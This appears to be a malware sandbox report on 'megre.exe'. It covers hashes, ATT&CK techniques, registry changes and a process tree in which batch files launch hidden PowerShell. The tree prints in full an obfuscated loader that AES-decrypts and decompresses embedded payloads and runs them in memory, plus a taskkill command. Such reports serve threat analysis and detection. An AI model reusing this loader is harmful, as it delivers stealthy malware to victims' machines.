80423e1859f8113de6b4971ac033426d0a3f699c6d4af6c63629ef0a42304137

Analysis

max time kernel
122s
max time network
133s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
28/06/2024, 08:01

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

megre.exe
Size

10.5MB
MD5

ad485a00ced247dfea489f7f8b2d63d4
SHA1

c33b804bf4ff09dd9b1f706aa94e3a63a37680d6
SHA256

80423e1859f8113de6b4971ac033426d0a3f699c6d4af6c63629ef0a42304137
SHA512

0e751ad42cd69c87a582c3563cb815331b6d23fa021b56cbcef5d90ff161cf06d1331afbc0bd83a231308190f2ca5e646eee12b56ed17bb0f751b0317dca175f
SSDEEP

196608:pgaR3Hfyik9FhUlsCXU6I5eVRkClSVU3iDz3S+7zLGly0IQaBXy95j+hhr:pgy3/aFhUo5qkClEZhcy0WXiEP

Score

8^/10

execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
916	powershell.exe
1340	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Kills process with taskkill 1 IoCs

evasion

pid	Process
2976	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 36 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000239cab856bb76a4396352e9c6c50dbca000000000200000000001066000000010000200000000a8101f84f1c5493d8a8079c9146e09fbacf7214543e6631823e205fc08fa6fd000000000e800000000200002000000031d9b91817787b0a3cdfbd31d4a4a71878832e70b032965acab14f080905656720000000ee9f60393f3fcd99e555f469b28fe2f2148551ecb017187f482571b913acb893400000003aed7b65970c4a0770e5b663930001e1dcf80796bc571bd2540664d31eb4630cfe2e6acb202a1f769ea01b295541466bf8ec6971fa6b7b9e36ec0684ddaf160e	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 30aabd7731c9da01	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000239cab856bb76a4396352e9c6c50dbca00000000020000000000106600000001000020000000d6a6df13b0dce591124221f42670a2175d105ae46d42fcadc32399165f3988a1000000000e8000000002000020000000d0a02e9306f4df8e6fdfa9191aa9228f46127469477298963d6aebf90a07025f90000000930cefeb74d02425eccdc6c43efdae457c301a0caa34bd616a26d1462c7852e0f6c9f377c69c7090d64e5c88f86eedb2cfc3e5b7140546617a97edb581e43312ab7dac0fc64374f61ecfb143d5a1ae91889441398c199051e39ea86e90658423b693911436bb2d109b23b779a20708ffec831b58addf4dc2f7eaa1934b88baf5edb562edcbc0d2a9f35474d24f0f5f8b4000000025e0c241c6ac3e6d41403926ee043937d5855b4a3d7a9ed81a89b9292ef1d90d986404901306eabc77d404bcfe193bc230822e1c6297d49c778c92ce209426f5	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "425723560"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\SearchScopes	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{A1C48381-3524-11EF-9988-CEEE273A2359} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "3"	iexplore.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1340	powershell.exe
916	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2976	taskkill.exe
Token: SeDebugPrivilege	1340	powershell.exe
Token: SeDebugPrivilege	916	powershell.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
556	iexplore.exe

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
556	iexplore.exe
556	iexplore.exe
784	IEXPLORE.EXE
784	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2584 wrote to memory of 2556	2584	megre.exe	28
PID 2584 wrote to memory of 2556	2584	megre.exe	28
PID 2584 wrote to memory of 2556	2584	megre.exe	28
PID 2584 wrote to memory of 2556	2584	megre.exe	28
PID 2556 wrote to memory of 2424	2556	cmd.exe	30
PID 2556 wrote to memory of 2424	2556	cmd.exe	30
PID 2556 wrote to memory of 2424	2556	cmd.exe	30
PID 2556 wrote to memory of 2424	2556	cmd.exe	30
PID 2556 wrote to memory of 2464	2556	cmd.exe	31
PID 2556 wrote to memory of 2464	2556	cmd.exe	31
PID 2556 wrote to memory of 2464	2556	cmd.exe	31
PID 2556 wrote to memory of 2464	2556	cmd.exe	31
PID 2556 wrote to memory of 2512	2556	cmd.exe	32
PID 2556 wrote to memory of 2512	2556	cmd.exe	32
PID 2556 wrote to memory of 2512	2556	cmd.exe	32
PID 2556 wrote to memory of 2512	2556	cmd.exe	32
PID 2556 wrote to memory of 320	2556	cmd.exe	33
PID 2556 wrote to memory of 320	2556	cmd.exe	33
PID 2556 wrote to memory of 320	2556	cmd.exe	33
PID 2556 wrote to memory of 320	2556	cmd.exe	33
PID 2556 wrote to memory of 2940	2556	cmd.exe	35
PID 2556 wrote to memory of 2940	2556	cmd.exe	35
PID 2556 wrote to memory of 2940	2556	cmd.exe	35
PID 2556 wrote to memory of 2940	2556	cmd.exe	35
PID 2424 wrote to memory of 2936	2424	cmd.exe	34
PID 2424 wrote to memory of 2936	2424	cmd.exe	34
PID 2424 wrote to memory of 2936	2424	cmd.exe	34
PID 2424 wrote to memory of 2936	2424	cmd.exe	34
PID 2464 wrote to memory of 3052	2464	cmd.exe	36
PID 2464 wrote to memory of 3052	2464	cmd.exe	36
PID 2464 wrote to memory of 3052	2464	cmd.exe	36
PID 2464 wrote to memory of 3052	2464	cmd.exe	36
PID 320 wrote to memory of 2064	320	cmd.exe	37
PID 320 wrote to memory of 2064	320	cmd.exe	37
PID 320 wrote to memory of 2064	320	cmd.exe	37
PID 320 wrote to memory of 2064	320	cmd.exe	37
PID 2512 wrote to memory of 2988	2512	cmd.exe	38
PID 2512 wrote to memory of 2988	2512	cmd.exe	38
PID 2512 wrote to memory of 2988	2512	cmd.exe	38
PID 2512 wrote to memory of 2988	2512	cmd.exe	38
PID 2940 wrote to memory of 1680	2940	cmd.exe	41
PID 2940 wrote to memory of 1680	2940	cmd.exe	41
PID 2940 wrote to memory of 1680	2940	cmd.exe	41
PID 2940 wrote to memory of 1680	2940	cmd.exe	41
PID 3052 wrote to memory of 2812	3052	cmd.exe	45
PID 3052 wrote to memory of 2812	3052	cmd.exe	45
PID 3052 wrote to memory of 2812	3052	cmd.exe	45
PID 3052 wrote to memory of 2812	3052	cmd.exe	45
PID 2064 wrote to memory of 2976	2064	cmd.exe	46
PID 2064 wrote to memory of 2976	2064	cmd.exe	46
PID 2064 wrote to memory of 2976	2064	cmd.exe	46
PID 2064 wrote to memory of 2976	2064	cmd.exe	46
PID 2988 wrote to memory of 556	2988	cmd.exe	47
PID 2988 wrote to memory of 556	2988	cmd.exe	47
PID 2988 wrote to memory of 556	2988	cmd.exe	47
PID 2988 wrote to memory of 556	2988	cmd.exe	47
PID 556 wrote to memory of 784	556	iexplore.exe	48
PID 556 wrote to memory of 784	556	iexplore.exe	48
PID 556 wrote to memory of 784	556	iexplore.exe	48
PID 556 wrote to memory of 784	556	iexplore.exe	48
PID 2936 wrote to memory of 696	2936	cmd.exe	50
PID 2936 wrote to memory of 696	2936	cmd.exe	50
PID 2936 wrote to memory of 696	2936	cmd.exe	50
PID 2936 wrote to memory of 696	2936	cmd.exe	50

C:\Users\Admin\AppData\Local\Temp\megre.exe
"C:\Users\Admin\AppData\Local\Temp\megre.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2584
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\cracker.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2556
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c "start /min "" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\skuld.1bat.bat""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2424
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\RarSFX0\skuld.1bat.bat"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2936
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bsf/NpJozho4NsL7QN8HGcY8I1wWUqtRucWFrAZILs8='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3p/Nybi14C/TUDyrfAg0pw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $TqpNz=New-Object System.IO.MemoryStream(,$param_var); $SFnHf=New-Object System.IO.MemoryStream; $OGGrE=New-Object System.IO.Compression.GZipStream($TqpNz, [IO.Compression.CompressionMode]::Decompress); $OGGrE.CopyTo($SFnHf); $OGGrE.Dispose(); $TqpNz.Dispose(); $SFnHf.Dispose(); $SFnHf.ToArray();}function execute_function($param_var,$param2_var){ $Gnglw=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uhAXU=$Gnglw.EntryPoint; $uhAXU.Invoke($null, $param2_var);}$YDdwP = 'C:\Users\Admin\AppData\Local\Temp\RarSFX0\skuld.1bat.bat';$host.UI.RawUI.WindowTitle = $YDdwP;$nDsHC=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($YDdwP).Split([Environment]::NewLine);foreach ($NwAlz in $nDsHC) { if ($NwAlz.StartsWith('wyIcJllqPgyiUvhwBQed')) { $zIwrG=$NwAlz.Substring(20); break; }}$payloads_var=[string[]]$zIwrG.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
        5⤵
        
        PID:696
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:916
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c "start /min "" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\wompwomp.bat""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2464
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\RarSFX0\wompwomp.bat"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3052
    - - C:\Windows\SysWOW64\cscript.exe
        
        cscript /nologo /e:jscript "C:\Users\Admin\AppData\Local\Temp\RarSFX0\wompwomp.bat"
        5⤵
        
        PID:2812
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c "start /min "" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\website.bat""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2512
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\RarSFX0\website.bat"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2988
    - - C:\Program Files\Internet Explorer\iexplore.exe
        
        "C:\Program Files\Internet Explorer\iexplore.exe" https://www.youtube.com/watch?v=fboNTcjJ8bo
        5⤵
        Modifies Internet Explorer settings
        Suspicious use of FindShellTrayWindow
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:556
      - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:556 CREDAT:275457 /prefetch:2
        6⤵
        Modifies Internet Explorer settings
        Suspicious use of SetWindowsHookEx
        
        PID:784
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c "start /min "" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskkiller.bat""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:320
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskkiller.bat"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2064
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im cmd.exe /f
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2976
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c "start /min "" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\XClient.bat""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2940
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\RarSFX0\XClient.bat"
      4⤵
      PID:1680
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/beQP5gYglAQtXhfCay6gTeypL30rohsnuvBkPJrqh0='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('t00C5/U8h4S1FsRNkbqHAw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $YHBZx=New-Object System.IO.MemoryStream(,$param_var); $eEXgm=New-Object System.IO.MemoryStream; $HNaZO=New-Object System.IO.Compression.GZipStream($YHBZx, [IO.Compression.CompressionMode]::Decompress); $HNaZO.CopyTo($eEXgm); $HNaZO.Dispose(); $YHBZx.Dispose(); $eEXgm.Dispose(); $eEXgm.ToArray();}function execute_function($param_var,$param2_var){ $vmKJo=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $umOut=$vmKJo.EntryPoint; $umOut.Invoke($null, $param2_var);}$BcsBi = 'C:\Users\Admin\AppData\Local\Temp\RarSFX0\XClient.bat';$host.UI.RawUI.WindowTitle = $BcsBi;$sEpDX=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($BcsBi).Split([Environment]::NewLine);foreach ($qDsBq in $sEpDX) { if ($qDsBq.StartsWith('wfAJqIYBIhJegJKaGFdO')) { $mCyHk=$qDsBq.Substring(20); break; }}$payloads_var=[string[]]$mCyHk.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
        5⤵
        
        PID:1268
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1340

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C428B1A3E5F57D887EC4B864FAC5DCC

Filesize
914B

MD5
e4a68ac854ac5242460afd72481b2a44

SHA1
df3c24f9bfd666761b268073fe06d1cc8d4f82a4

SHA256
cb3ccbb76031e5e0138f8dd39a23f9de47ffc35e43c1144cea27d46a5ab1cb5f

SHA512
5622207e1ba285f172756f6019af92ac808ed63286e24dfecc1e79873fb5d140f1ceb7133f2476e89a5f75f711f9813a9fbb8fd5287f64adfdcc53b864f9bdc5

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357

Filesize
1KB

MD5
a266bb7dcc38a562631361bbf61dd11b

SHA1
3b1efd3a66ea28b16697394703a72ca340a05bd5

SHA256
df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e

SHA512
0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3C428B1A3E5F57D887EC4B864FAC5DCC

Filesize
252B

MD5
cbd83b82ab2c511ff3c344d82c73a720

SHA1
b50e62b5f137ba3618eccdaed8dabb304d443f27

SHA256
4bae1bda2fa7db22c5e74ed7597a41292a6a1b6a3511732f305b54e8d6e79d30

SHA512
7cda5d6acc8eef355001c790be7b252c1d8003d89990ba5941f3a62ee7793f6c231733285d2aa185beb987413fbf637c2a82b3b0110eb2ebd04374bf313631db

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
57f73a40827886972ee6dd8800e868a9

SHA1
41cb33ba360e2f7b2223d3828d4e0e2158573486

SHA256
185e017317a482c359a0032bd88525a349817990f236101ce104fef69e32da64

SHA512
f5fe4af3b40837cecb62ff041512824716d098572c76d59b307cdaeb6e82538f2fc4a8334d37003ab3038d7de4fdde6b200feef4d20ea1a1bdda923292ab2fbd

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
a211cb9d78899c8d45746ab6c45ab36f

SHA1
86d298844e15480e8867bc65ed9e13d5c54cbf2c

SHA256
9d13cf41eb2efcf6cfb68a91f8078576c78de2a16d0efdf37fe8bc46ede49f0f

SHA512
1fadd6c5dea69e9ac58a401550c22f77cd6f58cfaf4e9805884682a2e967059f151fad0ac3d11c2f46d844ac83e53a8f879feeff46f8bdf351708a49ee1199ed

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
0ccb046950cb218ad7359b66401ef069

SHA1
e56330d5c5cb1393f093abd3f34c915fc63edbf6

SHA256
955f38befab08e301652f830887fc9c21cc7a7f7a37a3906d660db1c04e8066c

SHA512
f5e7f05667f898b01ff395bb335ab817359064a6bc7566f2c1dbbb0ddb00b67491ee095b2faacc919c32eeca0ecba94455bf7c5a15137e46c516e02ad5fa6c19

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
f385667e2bb2be6a934a753dcc1877a6

SHA1
9cca4b28f4866dda8698f0f8f82214d49eb6e511

SHA256
66386960eab65e7b4f26c768a42aa5503612a61b89b263f156bdc9791e36865e

SHA512
5166407a6075df44f5a3c066fa18201314fadafbbd87ac25e0b05117ab7d6dfdc3bdb56591c96161013b7d363ca5891bc7570f3378587ac333282af24943171a

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
d36dd570d6028ce173da4fa290a5301a

SHA1
3dba0d3345a57aee8bb68e8c5a32a4821b39d617

SHA256
5a93d4bc829ebd268b53ab06cbffeaeea11e29df7d05bc1621f63974d674c51e

SHA512
55bbd0e66d2fb716c66d50b514189c1606a63df0586b243e03a35ecaa8266d1734dffd29934e427385fde3fb06d525e5384443c0463fa57ac8b4894ba0627e3e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
591ff4192f3a0755770b90ecfabd1f37

SHA1
ac130fa252dc1bb18124182ace87b562499adff4

SHA256
d42cfbc0aec229e8215b920e7917930431522e9f1319772a88c3732bcaa1943d

SHA512
9024ddff741cb4b87cb08be86bafcd625f3812f724e8c670836365134081f8b6a91a3c99fd2422a11f038fb788ff6f8f1afe95bbffe9acfed7fd136ec685b3cc

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
3b28d4df0dd87c6a013ce0f963ef5efa

SHA1
58bf36217c2ab8af97579aefb5e7488253ce352f

SHA256
52cdd5fd3d085fda04c085e1b7d4642893b3831abb3371f14aa17a0549d84224

SHA512
ffec80b9965a7ac2f554ba4b5b2c57aff46c902aa4d921f5e607e7c04de35b571ae38fd63657eeba59b0cef84d018a768ea2e7731d81a754c971ecfb242e0b29

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
2fdebbd155ed2888def1dae43b241cbe

SHA1
ce7e2d32634ef4aee1deb90332521a2e2c64779f

SHA256
6679745ead5b1095a426b60c172004a75110099e65f13ffb86394abe8b2de0c5

SHA512
9e0bb28a69badf19a4d793b49b31e6e03000cdaa8d2cffb6b53570be7d7f9bc1e956a432cc761acc49f3d4cfdf2c637943eee28ed3c63efd6fe57466840085d8

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
cb644e6600786df78c6d7b0c4aeaf404

SHA1
95a2aba294bc642f240fbdee3c963a6887d7af88

SHA256
dc71eed4fc0114ee17c5388329abe468bf331369c153ac429900236a0df14e33

SHA512
a87ae41d2786a502a3d1a5ab6120dfc230a0d9322253e545fdd6a25b99caf00b90c0962d42cbe8f22efc6ebb175177898cb42cd7cbdce04417482881854a03d1

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
ea93fe4d265043c037d5824d945e4d37

SHA1
6fdf1552649778ad996d0810f4721908527fea27

SHA256
fdc5d97169df91241eb9082a2c7e865ca9e403b0226004b6fac6a7d926929f33

SHA512
3d308c8f6cea0ffc093e53badf335fbfc51dd9210583cbfe5e6f03ca33834d7ccfa668f1f4ffa38cb58f7791cfd1257b93198de45494a055ee1c74ae64a6fb50

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
